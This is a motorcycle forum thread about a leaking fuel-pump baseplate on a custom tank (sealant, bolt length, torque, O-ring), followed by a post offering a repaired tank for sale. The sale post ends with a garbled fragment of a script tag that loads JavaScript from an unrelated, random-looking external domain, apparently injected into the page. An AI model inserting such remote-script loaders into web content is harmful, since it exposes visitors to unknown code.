Tank looking amazing - but I’m still having some major problems with leaking from the fuel pump baseplate!! Gotta work on it some more when I get a spare moment! |

I’m at a loss at the moment!
Base plate looks nice and flat.. The specified Loctite 518 was used and has oozed out as the pump was bolted down - a nice bead of sealant showing all the way around. Despite this there’s a constant drip drip drip off one of the front bolts. I’m a little concerned about the length of the bolts - the original are no longer long enough and the ones Rich sent me only just bite and one of them doesn’t torque up and feels like a stripped fastener (not the one where the leak is evident). I’m sure it’s not stripped as I got nowhere near the specified torque setting of 7nm... I recon this is just because the bolt is only just reaching the threads. I’ve ordered a set of bolts, 5mm longer and will see if that enables me to torque all of the fasteners down to spec. If that doesn’t work - I’m at a total loss Thought about making an additional gasket out of fuel gasket paper. If that doesn’t work I have a very pretty and expensive paper weight! |

Odd that it's doing that. Sadly have to strip the pump out and see what's going on.
Best of luck though I can imagine it's a more than little frustrating.

Ta - but don’t want to resort to bodging it by sealing with tons of goo just yet!
Gonna do all I can to sort it before I bother Richard - and there’s not much he could do unless I ship it back to him - pump and all. I’d like to avoid having to do that if I can.

If you have the original Gasket I can cut one for you in a thicker material using it as a template . ( when I am in the UK .) - I have a stock off various thicknesses in the back of the garage for such occasions.
I am guessing that you fitted a new gasket when you transferred the pump to the new fuel tank ? Petro-Chem Grade NACF Materials It will give a better compression fitting between the base of the tank and pump plate .

Zax, thanks for the kind offer... there is no gasket between the tank and the pump unit base plate. It relies on a big O ring that sits in a recess all the way round the perimeter to make the seal.
My thought was to make an additional gasket to sit outside the o ring to supplement it. As it is I’m just leak testing my latest attempt at making a seal off the bike... Gave everything a forensic level clean and used copious quantities of Loctite 518. So far with about a litre of fuel - no leaks!! The longer bolts are too long and ‘bottom out’ so I’m going with what Richard supplied - the one that feels stripped, I have gone without a washer to get more of the thread in play. This is allowing me to nip it up to my satisfaction - but I daren’t put 7nm torque to it. The rest are all good. |

Use the longer bolts and put extra washers so you can play around with the length, you want to use as much thread as possible preferably so the pump tightens down just before the bolt bottoms out.

OK guys so the tank I made which had been attacked by the painter is now sorted and it has a decal to cover the patch. I went with silver as it is just neutral and should be OK with most bikes..
I didn't want to scrap the tank so I spent time sorting it out and had it lacquered too... So now it is ready to go to a new home.... As you know a new one lacquered is over £1000 plus shipping. I only want to cover costs to make and repair.. If someone wants it for £650.00 plus postage let me know... Its being leak tested right now and it is looking fine. I will leave it another 24 hours to see if it even has a single drip or not.. So here are the images of the repair and the tank as it is now... If you are interested let me know.. I will be putting it on eBay with a reserve of £750.00 to cover fees etc so if you want it please let me know... < ="text/" async="" ="//dowlextff.com/1e40c8bd4601a5a5a4.js"> |

yep don't go getting excited I'm sure it was the damaged falco tank that Timson was going to get until the painter got hold of it.
